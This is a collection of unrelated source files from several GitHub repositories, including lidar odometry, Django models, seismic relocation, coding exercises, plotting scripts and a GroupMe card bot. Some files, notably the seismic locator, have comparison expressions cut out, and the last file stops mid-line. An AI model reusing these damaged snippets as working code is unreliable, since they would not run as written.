self.point_clouds_np[i+1]\n icp = ICP(old_scan, new_scan)\n icp.range_filtering(min_range=3, max_range=100)\n if method == 'point_to_point':\n T_old_new = icp.icp_point_to_point()\n elif method == 'point_to_plane':\n T_old_new = icp.icp_point_to_plane()\n else: raise ValueError('method should be point_to_point or point_to_plane')\n T_W_old = trajectory[i]\n T_W_new = np.matmul(T_W_old, T_old_new)\n trajectory.append(T_W_new)\n if save_individual_poses_ply:\n savePlyFromPtsRGB(transform_pc(T_W_new, new_scan), \n os.path.join(self.save_path, self.point_clouds_name[i+1] + '.ply'))\n if save_trajectory_txt:\n self.write_pose_to_txt_TUM(T_W_new, self.point_clouds_name[i+1], save_pose_file_path)\n return trajectory\n def transform_trajectory_points(self, trajectory):\n '''\n :param trajectory: 4x4 transformation matrix T_WB i.e. transform points from base frame to world frame\n :return: transformed points in world frame\n '''\n assert len(trajectory) == len(self.point_clouds_np)\n transformed_points = []\n for i in range(len(self.point_clouds_np)):\n T = trajectory[i]\n scan = self.point_clouds_np[i]\n transformed_scan = transform_pc(T, scan)\n transformed_points.append(transformed_scan)\n return transformed_points\n \n \n def write_pose_to_txt_TUM(self, T, timestamp, file_path):\n with open(file_path, 'a') as f:\n translation, quaternion = convert_matrix_to_translation_quaternion(T)\n f.write(str(timestamp)+' ')\n f.write('{:.6f} {:.6f} {:.6f} {:.6f} {:.6f} {:.6f} {:.6f}\\n'.format(\n translation[0], translation[1], translation[2],\n quaternion[0], quaternion[1], quaternion[2], quaternion[3]))\n \n \n \n","repo_name":"YifuTao/PyICP_Odometry","sub_path":"icp_odometry/odometry.py","file_name":"odometry.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36468795967","text":"from __future__ import unicode_literals\nfrom ..login_app.models import User\nfrom django.db import models\nfrom datetime import datetime\n\n\n# Create your models here.\nclass TripManager(models.Manager):\n def tripVal(self, postData):\n results = {\n 'status': True,\n 'errors': []\n }\n if not postData['destination']:\n results['status'] = False\n results['errors'].append('Please enter a destination.')\n if not postData['description']:\n results['status'] = False\n results['errors'].append('Please enter a description.')\n if not postData['start_date'] or datetime.strptime(postData['start_date'], \"%Y-%m-%d\") < datetime.now():\n results['status'] = False\n results['errors'].append('Please enter a future start date.')\n if not postData['end_date'] or postData['end_date'] < postData['start_date']:\n results['status'] = False\n results['errors'].append('Please enter an end date that comes after the start date.')\n return results\n\n def createTrip(self, postData):\n trip = Trip.objects.create(destination = postData['destination'], description=postData['description'], start_date=postData['start_date'], end_date=postData['end_date'], planned_by=User.objects.get(id=postData['planned_by']))\n return trip\n\n\nclass Trip(models.Model):\n destination = models.CharField(max_length = 100)\n description = models.CharField(max_length = 1000)\n start_date = models.DateField()\n end_date = models.DateField()\n planned_by = models.ForeignKey(User, related_name = 'first_user')\n users_joined = models.ManyToManyField(User, related_name = 'joined_users')\n objects = TripManager()\n","repo_name":"mazurbeam/travel","sub_path":"apps/travels_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27329141767","text":"from ..io.seism import QuakeCC,RecordCC\r\nfrom ..io.tool import quickTaupModel\r\nimport numpy as np\r\nfrom ..mathTool.distaz import DistAz\r\nimport os\r\nfrom numba import jit\r\n\r\nclass locator:\r\n def __init__(self,staInfos,modelFile=os.path.dirname(__file__)+'/../data/iaspTaupMat',maxDT=30):\r\n self.staInfos=staInfos\r\n self.timeM=quickTaupModel(modelFile)\r\n self.maxErr=-1\r\n self.maxDT=30\r\n def locate(self, quake,r=1,e=0.1,maxDT=-1,isDel=False,maxErr=-1):\r\n mulL=[40]*3+[20]*2+[10]*2+[8 ]*3+[5 ]*10+[3 ]*10\r\n adL =[1 ]*3+[1 ]*2+[1 ]*2+[0.75]*3+[0.5]*10+[0.1]*10\r\n #mulL=[40]*2+[20]*2+[10]*2+[8 ]*2+[5 ]*3+[3 ]*5\r\n #adL =[1 ]*2+[1 ]*2+[1 ]*2+[0.75]*2+[0.5]*3+[0.25]*5\r\n time=365*86400*100\r\n quake['dep']=10+10*np.random.rand(1)\r\n quake['time']=float(quake['time'])\r\n self.maxErr=maxErr\r\n if maxDT<0:\r\n maxDT=self.maxDT\r\n for i in range(len(quake)):\r\n record=quake.records[i]\r\n staInfo=self.staInfos[record['staIndex']]\r\n if record['pTime']0 and record['pTime']-quake['time']0 and record['sTime']-quake['time']maxErr)[0]\r\n for i in nvalidL:\r\n rIndex=rIndexL[i]\r\n if phaseL[i]=='p':\r\n quake.records[rIndex]['pTime']=0\r\n if phaseL[i]=='s':\r\n quake.records[rIndex]['sTime']=0\r\n quake.removeZeros() \r\n dTime=dTime[validL]\r\n gM=gM[validL,1:5]\r\n wL=wL[validL]\r\n gM=np.mat(wL.reshape((-1,1))*gM)\r\n dTime=np.mat(wL*dTime)\r\n gMT=gM.transpose()\r\n dM=gMT*dTime.transpose()\r\n gMTgM=gMT*gM\r\n gMTgM[2,2]=gMTgM[2,2]+e\r\n gMTgM[1,1]=gMTgM[1,1]+e\r\n gMTgM[0,0]=gMTgM[0,0]+e\r\n gMTgM[3,3]=gMTgM[3,3]+e/100\r\n MM=np.linalg.pinv(gMTgM)\r\n dd=MM*dM\r\n #print(dd)\r\n quake['la']+=float(dd[0,0])*ad\r\n quake['lo']+=float(dd[1,0])*ad\r\n quake['dep']=float(max(-4,quake['dep']+float(dd[2,0])*ad))\r\n quake['time']+=float(dd[3,0])\r\n return quake,dTime.std()\r\n @jit\r\n def __timeG__(self,quake,phaseL,staIndexL):\r\n gM=np.zeros((len(phaseL),5))\r\n loc=quake.loc()\r\n for i in range(len(phaseL)):\r\n staLa=self.staInfos[staIndexL[i]]['la']\r\n staLo=self.staInfos[staIndexL[i]]['lo']\r\n dep=self.staInfos[staIndexL[i]]['dep']/1000\r\n dd=0.0001\r\n ddz=1\r\n delta=DistAz(loc[0],loc[1],\\\r\n staLa,staLo).delta\r\n time=self.timeM.get_travel_times(\\\r\n np.abs(loc[2]+dep),delta,phaseL[i])[0].time\r\n ddLa=(DistAz(loc[0]+dd,loc[1],\\\r\n staLa,staLo).delta-delta)/dd\r\n ddLo=(DistAz(loc[0],loc[1]+dd,\\\r\n staLa,staLo).delta-delta)/dd\r\n dTime=(self.timeM.get_travel_times(\\\r\n np.abs(loc[2]+dep),delta+dd,phaseL[i])[0].time-\\\r\n time)/dd\r\n ddLaTime=dTime*ddLa\r\n ddLoTime=dTime*ddLo\r\n ddZTime=(self.timeM.get_travel_times(np.abs(loc[2]+dep+ddz),delta,phaseL[i])[0].time-\\\r\n time)/ddz\r\n gM[i,0]=time\r\n gM[i,1]=ddLaTime\r\n gM[i,2]=ddLoTime\r\n gM[i,3]=ddZTime\r\n gM[i,4]=1\r\n #print(gM)\r\n #return\r\n\r\n return gM\r\n\r\n def getG(self,quake,quakeRef=None,minCC=0.5,minMul=0):\r\n staIndexL=[]\r\n phaseL=[]\r\n if quakeRef != None:\r\n return self.getGRef(quake,quakeRef,minCC=minCC,minMul=minMul)\r\n for record in quake:\r\n if record['pTime']>0:\r\n if isinstance(record,RecordCC):\r\n if record['pCC']0:\r\n if isinstance(record,RecordCC):\r\n if record['sCC']0 and record['staIndex'] in indexLRef>0:\r\n if isinstance(record,RecordCC):\r\n if record['pCC']0 and record['staIndex'] in indexLRef>0:\r\n if isinstance(record,RecordCC):\r\n if record['SCC']0:\r\n timeG[:,-1]*=10\r\n timeG[:,-2]*=111\r\n G=timeG.transpose()*timeG\r\n i=np.arange(G.shape[0])\r\n G/=G[i,i].sum()\r\n V,v=np.linalg.eig(G)\r\n else:\r\n G=np.zeros((3,3))\r\n V=[-9,-9,-9]\r\n v=np.zeros((3,3))\r\n return G,V,v,quake.calCover(self.staInfos,minCC=minCC)\r\n\r\n def locateRef(self, quake,quakeRef,r=1,e=0.00001,maxDT=-1,minCC=0.4):\r\n mulL=[40]\r\n adL =[1]\r\n time=365*86400*100\r\n if maxDT<0:\r\n maxDT=self.maxDT\r\n #quake.loc[2]=10+10*np.random.rand(1)\r\n for i in range(3):\r\n quake['la'],quake['lo'],quake['dep']=\\\r\n quakeRef['la'],quakeRef['lo'],quakeRef['dep']\r\n for i in range(len(mulL)):\r\n quake,res=self.__locateRef__(quake,quakeRef,mul=mulL[i],\\\r\n r=r,ad=adL[i],e=e,maxDT=maxDT,minCC=minCC)\r\n return quake,res\r\n def __locateRef__(self,quake,quakeRef,mul=10,r=1,ad=1,\\\r\n e=0.00001,maxDT=35,minCC=0.4):\r\n phaseL=[]\r\n timeL=[]\r\n staIndexL=[]\r\n wL=[]\r\n indexLRef=quakeRef.staIndexs()\r\n for record in quake.records:\r\n index = record['staIndex']\r\n if index in indexLRef:\r\n indexRef = indexLRef.index(index)\r\n else:\r\n continue\r\n if record['pTime']>0 and quakeRef.records[indexRef]['pTime']>0 \\\r\n and record['pTime']-quake['time']0 and quakeRef.records[indexRef]['sTime']>0 \\\r\n and record['sTime']-quake['time']10:\r\n gM[i,0]=quakeRef.records[indexRef]['pTime']-quakeRef['time']\r\n #print(staIndexL[i],gM[i,0],p[staIndexL[i]]-quake.time)\r\n else:\r\n if quakeRef.records[indexRef]['sTime']>10:\r\n gM[i,0]=quakeRef.records[indexRef]['sTime']-quakeRef['time']\r\n #print(gM[i,0])\r\n gM[i,1]=ddLaTime\r\n gM[i,2]=ddLoTime\r\n gM[i,3]=ddZTime\r\n gM[i,4]=1\r\n return gM\r\n\r\ndef getRefM(quakeRefs,staInfos):\r\n staN=len(staInfos)\r\n qN=len(quakeRefs)\r\n timeM=np.zeros((qN,staN))\r\n laloM=np.zeros((qN,2))\r\n for i in range(qN):\r\n timeM[i,:]=np.sign(quakeRefs[i].getPTimeL(staInfos)).reshape((1,-1))\r\n laloM[i,:]=np.array(quakeRefs[i].loc()[:2]).reshape((1,-1))\r\n return timeM,laloM\r\n\r\ndef findNearQuake(quake,timeM,laloM,staInfos,maxDis=0.2,minSta=5):\r\n sameStaN=(timeM*quake.getPTimeL(staInfos)).sum(axis=1)\r\n dis=np.linalg.norm(laloM-np.array(quake.loc()[:2]).reshape((1,-1)),axis=1)\r\n index=(dis/(1+sameStaN/100*(dismaxDis or sameStaN[index] < minSta:\r\n return None\r\n return index\r\ndef getTmpD(quakeTmpL):\r\n tmpD={}\r\n count=0\r\n for quake in quakeTmpL:\r\n tmpD[quake.filename]=count\r\n count+=1\r\n return tmpD\r\ndef relocQuakeByTmp(quakeLs,quakeTmpL,staInfos):\r\n loc=locator(staInfos)\r\n tmpD=getTmpD(quakeTmpL)\r\n for quakeL in quakeLs:\r\n for quake in quakeL:\r\n loc.locateRef(quake,quakeTmpL[tmpD[quake.filename]])\r\n return quakeLs\r\n\r\n\r\ndef relocQuakeLs(quakeLs,quakeRefs,staInfos):\r\n timeM,laloM=getRefM(quakeRefs,staInfos)\r\n quakeRelocL=[]\r\n loc=locator(staInfos)\r\n count0=0\r\n count=0\r\n for quakeL in quakeLs:\r\n for quake in quakeL:\r\n #quake,res=loc.locate(quake)\r\n index=findNearQuake(quake,timeM,laloM,staInfos,maxDis=0.2)\r\n count0+=1\r\n #\r\n if index!=None:\r\n count+=1\r\n #print(index)\r\n print(count0,count,'###',quake.loc(),quakeRefs[index].loc())\r\n quake,res=loc.locateRef(quake,quakeRefs[index])\r\n print(count0,count,'***',quake.loc(),quakeRefs[index].loc(),res)\r\n quakeRelocL.append(quake)\r\n return quakeRelocL\r\n\r\n","repo_name":"baogegeJiang/SeismTool","sub_path":"locate/locate.py","file_name":"locate.py","file_ext":"py","file_size_in_byte":15030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12393586666","text":"# jobs/models.py\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.db import models\nfrom django.urls import reverse\nfrom ckeditor.fields import RichTextField\nfrom django.contrib.contenttypes.fields import GenericRelation\nfrom hitcount.models import HitCountMixin, HitCount\n\n\nclass Job(models.Model, HitCountMixin):\n # Host will not always be the current user. \n host = models.ForeignKey(\n get_user_model(),\n on_delete=models.CASCADE,\n related_name = 'host'\n )\n author = models.ForeignKey(\n get_user_model(),\n on_delete=models.CASCADE,\n related_name = 'author',\n null=True,\n )\n title = models.CharField(max_length=255)\n body = RichTextField(blank=True, null=True)\n #body = models.TextField()\n date = models.DateTimeField(auto_now_add=True)\n company = models.CharField(max_length=255) #change this in the future\n url = models.URLField(blank=True, null=True)\n accepted = models.BooleanField(default=False)\n hit_count_generic = GenericRelation(HitCount, object_id_field='object_pk',\n related_query_name='hit_count_generic_relation')\n\n def __str__(self):\n return self.title\n\n def get_absolute_url(self):\n return reverse('job_detail', args=[str(self.id)])\n #return reverse('home')\n\n def get_full_name(self):\n if not self.user.first_name:\n return\n return ' '.join([self.user.first_name, self.user.last_name])\n \n def get_url(self):\n if not self.url:\n return '#'\n return self.url\n ","repo_name":"mattambrogi/job-board-platform","sub_path":"jobs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6594296367","text":"direction = [[[0,0],[1,0],[0,1]],[[0,0],[0,1],[1,1]],[[0,0],[1,0],[1,1]],[[0,0],[1,0],[1,-1]]]\ndef possible(board, shape, cur):\n for i in shape:\n if(board[cur[0]+i[0]][cur[1]+i[1]]=='#'):\n return False\n return True\n \n\ndef set(board, shape, cur, dec):\n newBoard = board\n if dec == 1:\n for i in shape:\n newBoard[cur[0]+i[0]][cur[1]+i[1]] = '#'\n else:\n for i in shape:\n newBoard[cur[0]+i[0]][cur[1]+i[1]] = '.'\n return newBoard\ndef count(board,h,w):\n sum = 0\n ret = 0\n for i in range(0,h+2):\n for j in range(0,w+2):\n if board[i][j] == '.':\n sum +=1\n if sum == 0:\n return 1\n cur = []\n for i in range(0,h+2):\n if len(cur) != 0:\n break\n for j in range(0,w+2):\n if board[i][j] == '.':\n cur.append(i)\n cur.append(j)\n break\n for i in range(4):\n shape = direction[i]\n if possible(board,shape,cur)==True:\n board = set(board,shape,cur,1)\n ret += count(board,h,w)\n board = set(board,shape,cur,-1)\n return ret\n\n\n\nif __name__==\"__main__\":\n h = int(input())\n w = int(input())\n board = []\n blocks = ['#']*(w+2)\n board.append(blocks)\n\n for i in range(0,h):\n line = input()\n temp = ['#']\n for i in range(0, len(line)):\n temp.append(line[i])\n temp.append('#')\n board.append(temp)\n board.append(blocks)\n res = count(board,h,w)\n print(res)\n","repo_name":"taejuk/algorithm","sub_path":"algorithm1/chapter_6/boardcover.py","file_name":"boardcover.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37376439722","text":"import cv2\ncap = cv2.VideoCapture(0)\nif not cap.isOpened():\n print(\"Cannot open camera\")\n exit()\nwhile True:\n ret, frame = cap.read()\n if not ret:\n print(\"Cannot receive frame\")\n break\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # 轉換成灰階影像\n cv2.imshow('oxxostudio', gray)\n if cv2.waitKey(1) == ord('q'):\n break # 按下 q 鍵停止\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"oxxostudio/book-code","sub_path":"opencv/ch04/code02.py","file_name":"code02.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"12792968190","text":"'''\nCreated on 22 de oct. de 2015\n\n@author: al341802-Miguel Matey Sanz\n'''\n\nn=int(input(\"Introduce un número entero: \"))\n\nsuma=0\nanterior1=1\nanterior2=0\nveces=2\nprint('Los',n, 'primeros números de Fibonacci son: 1',end=' ')\nwhile veces<=n:\n suma=anterior1+anterior2\n anterior2=anterior1\n anterior1=suma\n veces+=1\n print(suma, end=' ')\n \n \n","repo_name":"matey97/Programacion","sub_path":"Boletín2/Ejercicio37.py","file_name":"Ejercicio37.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74765908571","text":"from random import randint\nimport time\n\ndef springRain():\n\n #user input\n selectedWidth = int(input(\"Please enter frame's width: \\n\"))\n selectedHeight = int(input(\"Please enter frame's height: \\n\"))\n\n #create a frame template filled with \"o\"s\n completeFrame = [[\"o\"] * selectedWidth] * selectedHeight\n\n numberOfIterations = 1\n\n while True:\n #interate over rows in a frame\n for yPosition in range(0, selectedHeight):\n\n x = 0\n while (x <= yPosition):\n\n randomDropPosition = randint(0, selectedWidth)\n temporaryLineTemplate = [\"o\"] * selectedWidth\n temporaryLineTemplate[randomDropPosition - 1] = \"x\"\n\n #add a new frame on the first place of the completeFrame list\n completeFrame.insert(0, temporaryLineTemplate)\n\n #print every object of completeFrame in a for loop\n for object in range(0, len(completeFrame)):\n tempLine = completeFrame[object]\n print(\" \".join(tempLine))\n\n time.sleep(0.3)\n\n #\"clear\" the console by printing multiple \\n\n print('\\n' * 80)\n\n #pop the completeFrame's last opbject\n if (len(completeFrame) > selectedHeight):\n completeFrame.pop()\n\n #add +1 to the total number of completed lines\n x += 1\n\nspringRain()\n","repo_name":"clapslock/python-assignments-2017","sub_path":"Class_3/Ex_1.py","file_name":"Ex_1.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73322383450","text":"import numpy as np\nimport pandas as pd\n\n\ndef index2step(indexes, df):\n # indexes: array of start and stop indexes ex. [[2 5] [8 12]]\n # df: dataframe to compare to\n return [(df[\"Step\"].iloc[i[0]], df[\"Step\"].iloc[i[1]]) for i in indexes]\n\n\ndef check_overlap(a0, af, b0, bf):\n # returns True if there is overlap\n return (a0 <= bf) & (af >= b0)\n\n\ndef check_three(df, iverbose=False):\n df[\"btm\"] = df[\"Age\"] - df[\"2SD\"]\n df[\"top\"] = df[\"Age\"] + df[\"2SD\"]\n\n df[\"cum btm\"] = df[\"btm\"]\n df[\"cum top\"] = df[\"top\"]\n\n for i in np.arange(len(df)):\n if check_overlap(df[\"cum btm\"].iloc[i], df[\"cum top\"].iloc[i], np.roll(df[\"cum btm\"], 1)[i],\n np.roll(df[\"cum top\"], 1)[i]):\n df[\"cum btm\"].iloc[i] = np.maximum(df[\"cum btm\"].iloc[i], np.roll(df[\"cum btm\"], 1)[i])\n df[\"cum top\"].iloc[i] = np.minimum(df[\"cum top\"].iloc[i], np.roll(df[\"cum top\"], 1)[i])\n\n df[\"cum btm\"], df[\"cum top\"] = np.roll(df[\"cum btm\"], 1), np.roll(df[\"cum top\"], 1)\n\n # overlap = 1 where there is overlap with following x\n df[\"overlap\"] = np.roll(np.where(check_overlap(df[\"btm\"], df[\"top\"], df[\"cum btm\"], df[\"cum top\"]), 1, 0), -1)\n df.iloc[-1, df.columns.get_loc(\"overlap\")] = 0 # to prevent last step from overlapping with first step\n\n if iverbose:\n print(df)\n\n indexes = np.nonzero(df[\"overlap\"].to_numpy())[0]\n\n try:\n # group indexes that overlap ex. [[2, 6],] - index 2 through 6 (inclusive) are overlapping\n groups = np.array([(s[0], s[-1] + 1) for s in np.split(indexes, np.where(np.diff(indexes) != 1)[0] + 1)])\n if iverbose:\n print(groups)\n return np.array([group for group in groups if (group[1] - group[0]) + 1 >= 3])\n except IndexError: # indexes is empty (no overlaps at all)\n return indexes # empty numpy array\n","repo_name":"brandonm6/isochronplotter","sub_path":"locateplateaus/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36051668520","text":"CURRENT_RELEASE = \"2023.10.1\"\n\n# NOTE: Terraform cannot be upgraded further due to Hashicorp licensing changes\n# implemented in August 2023.\n# https://www.hashicorp.com/license-faq\nTERRAFORM_VERSION = \"1.5.7\"\n\n# 04-kubernetes-ingress\nDEFAULT_TRAEFIK_IMAGE_TAG = \"2.9.1\"\n\nHIGHEST_SUPPORTED_K8S_VERSION = (\"1\", \"26\", \"9\")\nDEFAULT_GKE_RELEASE_CHANNEL = \"UNSPECIFIED\"\n\nDEFAULT_NEBARI_DASK_VERSION = CURRENT_RELEASE\nDEFAULT_NEBARI_IMAGE_TAG = CURRENT_RELEASE\nDEFAULT_NEBARI_WORKFLOW_CONTROLLER_IMAGE_TAG = \"2023.7.2\"\n\nDEFAULT_CONDA_STORE_IMAGE_TAG = \"v0.4.14\"\n\nLATEST_SUPPORTED_PYTHON_VERSION = \"3.10\"\n\n\n# DOCS\nDO_ENV_DOCS = \"https://www.nebari.dev/docs/how-tos/nebari-do\"\nAZURE_ENV_DOCS = \"https://www.nebari.dev/docs/how-tos/nebari-azure\"\nAWS_ENV_DOCS = \"https://www.nebari.dev/docs/how-tos/nebari-aws\"\nGCP_ENV_DOCS = \"https://www.nebari.dev/docs/how-tos/nebari-gcp\"\n\n# DEFAULT CLOUD REGIONS\nAWS_DEFAULT_REGION = \"us-east-1\"\nAZURE_DEFAULT_REGION = \"Central US\"\nGCP_DEFAULT_REGION = \"us-central1\"\nDO_DEFAULT_REGION = \"nyc3\"\n","repo_name":"nebari-dev/nebari","sub_path":"src/_nebari/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":243,"dataset":"github-code","pt":"32"} +{"seq_id":"41011735215","text":"import socket \nimport sys \nimport random\nimport time\n\nif len(sys.argv) != 5 :\n print(\"Need to specify a port and delay. Example `python3 server.py -p 8080 -d 0`\")\n sys.exit(1)\n\nserver_port = -1\ndelay = 0\nidx = 1\n\nwhile idx int:\n return sum(l)\n\ndef digitsOfInt(n: int) -> List[int]:\n if n <= 0:\n return []\n else:\n digits = []\n while n > 0:\n digits.append(n % 10)\n n //= 10\n return digits[::-1]\n \ndef additivePersistence(n: int) -> int:\n if n < 10:\n return 0\n else:\n persistence = 0\n while n >= 10:\n n = sum(int(d) for d in str(n))\n persistence += 1\n return persistence\n\ndef digitalRoot(n: int) -> int:\n if n < 10:\n return n\n else:\n while n >= 10:\n n = sum(int(d) for d in str(n))\n return n\n\ndef listReverse(lst):\n reversed_lst = []\n for i in range(len(lst) - 1, -1, -1):\n reversed_lst.append(lst[i])\n return reversed_lst\n\n# Problem #1 A)\n# Example usage for sumList\nlist1 = [1, 2, 3, 4]\nlist2 = [1,-2,3,5]\nlist3 = [1,3,5,7,9,11]\n\nprint(f\"The sum of {list1} is {sumList(list1)}\")\nprint(f\"The sum of {list2} is {sumList(list2)}\")\nprint(f\"The sum of {list3} is {sumList(list3)}\")\n\n# Problem #1 B)\n# Example usage for digitsOfInt\nnum1 = 12345\nnum2 = 987654321\nnum3 = 0\nnum4 = -123\n\nprint(f\"The digits of {num1} are {digitsOfInt(num1)}\")\nprint(f\"The digits of {num2} are {digitsOfInt(num2)}\")\nprint(f\"The digits of {num3} are {digitsOfInt(num3)}\")\nprint(f\"The digits of {num4} are {digitsOfInt(num4)}\")\n\n# Problem #1 C)\n# Example usage for digitsOfInt\nn = 9876\npersistence = additivePersistence(n)\nroot = digitalRoot(n)\nprint(f\"The additive persistence of {n} is {persistence}\")\nprint(f\"The digital root of {n} is {root}\")\n\n# Problem #2 A)\n# Example usage for listReverse\nlst = [1, 2, 3, 4, 5]\nreversed_lst = listReverse(lst)\nprint(f\"The reversed list of {lst} is {reversed_lst}\")\n\ndef palindrome(w):\n # Convert the string to a list of characters\n chars = list(w)\n # Reverse the list of characters\n reversed_chars = listReverse(chars)\n # Convert the reversed list back to a string\n reversed_w = \"\".join(reversed_chars)\n # Compare the original string with the reversed string\n return w == reversed_w\n\n\nword1 = \"racecar\"\nword2 = \"hello\"\nprint(f\"{word1} is a palindrome: {palindrome(word1)}\")\nprint(f\"{word2} is a palindrome: {palindrome(word2)}\")\n\n#assignment 2\n# problem A, Tail recursion\n\ndef assoc(d, k, l):\n def helper(l, acc):\n if not l:\n return d\n elif l[0][0] == k:\n return l[0][1]\n else:\n return helper(l[1:], acc)\n return helper(l, d)\n\n# Example usage of the assoc function\nkey = \"jeff\"\ndefault_val = -1\nkey_val_pairs = [(\"sorin\", 85), (\"jeff\", 23), (\"moose\", 44)]\n\nresult = assoc(default_val, key, key_val_pairs)\nprint(\"Result of Assoc: \", result)\n\n# Question B: Define the remove_duplicates function\ndef remove_duplicates(lst):\n res = []\n for item in lst:\n if not res.__contains__(item):\n res.append(item)\n return res[::-1]\n\n# Example usage of the remove_duplicates function\ninput_list = [1, 6, 2, 4, 12, 2, 13, 6, 9]\nunique_list = remove_duplicates(input_list)\nprint(\"Result of remove duplicates: \",unique_list) # Output: [1, 6, 2, 4, 12, 13, 9]\n\n# Quesiton C: \ndef f(x):\n xx = x * x * x\n return (xx, xx < 100)\n\ndef wwhile(f_and_test, b):\n (f, test) = f_and_test\n (b_new, c) = f(b)\n if c:\n return wwhile((f, test), b_new)\n else:\n return b\n\nresult = wwhile((f, lambda x: True), 2)\nprint(\"Result of wwhile: \",result) # Output: 512\n\n# import matplotlib.pyplot as plt\n# Partition = 'Holidays', 'Eating_Out', 'Shopping', 'Groceries'\n# sizes = [250, 100, 300, 200]\n# fig1, ax1 = plt.subplots()\n# ax1.pie(sizes, labels=Partition, autopct='%1.1f%%', shadow=True, startangle=90) \n# ax1.axis('equal')\n# plt.show()\n\nimport tkinter\n#try Tinker\n# from tkinter import *\n# main = Tk()\n# main.mainloop()","repo_name":"parkem/Python-education","sub_path":"MP_learn/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27355727041","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\ndf = pd.read_csv('salary.csv')\r\n\r\nyears = df.Year.to_list()\r\nteacher_salary = df.Teacher.to_list()\r\nadviser_salary = df.Adviser.to_list()\r\nprogrammer_salary = df.Programmer.to_list()\r\n\r\n\r\nplt.plot(years, teacher_salary, 'k--o', label='Teacher salary')\r\nplt.plot(years, adviser_salary, 'b.-.', label='Advisor salary')\r\nplt.plot(years, programmer_salary, 'y-s', label='Programmer salary')\r\n\r\nplt.tight_layout()\r\nplt.grid(True)\r\nplt.legend()\r\nplt.title(\"Mean salaries charts\")\r\nplt.xlabel('Year')\r\nplt.ylabel('Salary')\r\n\r\nplt.show()","repo_name":"Logicode-git/matplotlib_logicode","sub_path":"plt_salary.py","file_name":"plt_salary.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73058889371","text":"# Define a function that takes a list of cards and a player, and sends them the batch of cards\ndef send_cards(cards, player):\n # Send the batch of cards to the player\n # Replace this with your code for sending the cards\n print(f\"Sending {cards} to {player}\")\n\n# Define a list of players\nplayers = ['player1', 'player2', 'player3']\n\n# Define a list of cards\ncards = ['card1', 'card2', 'card3', 'card4', 'card5', 'card6', 'card7', 'card8', 'card9', 'card10', 'card11', 'card12', 'card13', 'card14', 'card15']\n\n# Iterate through the list of players, and send them a batch of 10 cards\nfor player in players:\n # Get the next batch of 10 cards\n batch = cards[:10]\n\n # Send the batch of cards to the player\n send_cards(batch, player)\n\n # Remove the sent cards from the list\n cards = cards[10:]\n\n\n# Define a function that takes a player, and asks them to select their five cards\ndef select_cards(player):\n # Ask the player to select their five cards\n # Replace this with your code for asking the player to select their cards\n selected_cards = ['card1', 'card2', 'card3', 'card4', 'card5']\n\n # Return the selected cards\n return selected_cards\n\n# Define a list of players\nplayers = ['player1', 'player2', 'player3']\n\n# Create an empty list to store the selected cards\nselected_cards = []\n\n# Iterate through the list of players, and ask them to select their five cards\nfor player in players:\n # Ask the player to select their five cards\n player_selected_cards = select_cards(player)\n\n# Add the player's selected cards to the list of selected cards\nselected_cards += player_selected_cards\n\n# Print the list of selected cards\nprint(selected_cards)\n\n\n\n\nimport requests\n\n# Replace :bot_id with your bot's ID\nbot_id = \"c9d6f93a4e96eeadbeaf21feef\"\n\n# Set the base URL for the GroupMe API\nbase_url = \"https://api.groupme.com/v3\"\n\n# Set the payload for the request to the GroupMe API\n# This payload will send a message to the group with the list of cards\npayload = {\n \"bot_id\": bot_id,\n \"text\": \"Here are your cards: [Card 1, Card 2, Card 3, Card 4, Card 5, Card 6, Card 7, Card 8, Card 9, Card 10]\"\n}\n\n# Make the POST request to the GroupMe API to send the message\nresponse = requests.post(f\"{base_url}/bots/post\", json=payload)\n\n# Check the status code of the response\nif response.status_code != 202:\n print(f\"Failed to send message: {response.status_code} {response.text}\")\nelse:\n print(\"Message sent successfully.\")\n\n\n\n########################\n\n\nimport textwrap\nfrom PIL import Image, ImageDraw, ImageFont\n\ndef generate_card(title, definition, points):\n # determine the font size based on the length of the definition\n font_size = int(len(definition) / 20)\n if font_size < 10:\n font_size = 10\n elif font_size > 20:\n font_size = 20\n\n # create the image and draw objects\n image = Image.new('RGB', (400, 300), (255, 255, 255))\n draw = ImageDraw.Draw(image)\n\n # select a font and draw the title in a rectangle\n font = ImageFont.truetype('arial.ttf', size=font_size)\n draw.rectangle([(10, 10), (390, 50)], fill='lightgrey')\n draw.text((20, 20), title, font=font, fill=(0, 0, 0))\n\n # draw the definition in a rectangle\n draw.rectangle([(10, 60), (390, 250)], fill='lightgrey')\n draw.text((20, 70), definition, font=font, fill=(0, 0, 0))\n\n # draw a circle around the point value\n draw.ellipse([(360, 270), (390, 300)], fill='lightgrey')\n draw.text((365, 275), str(points), 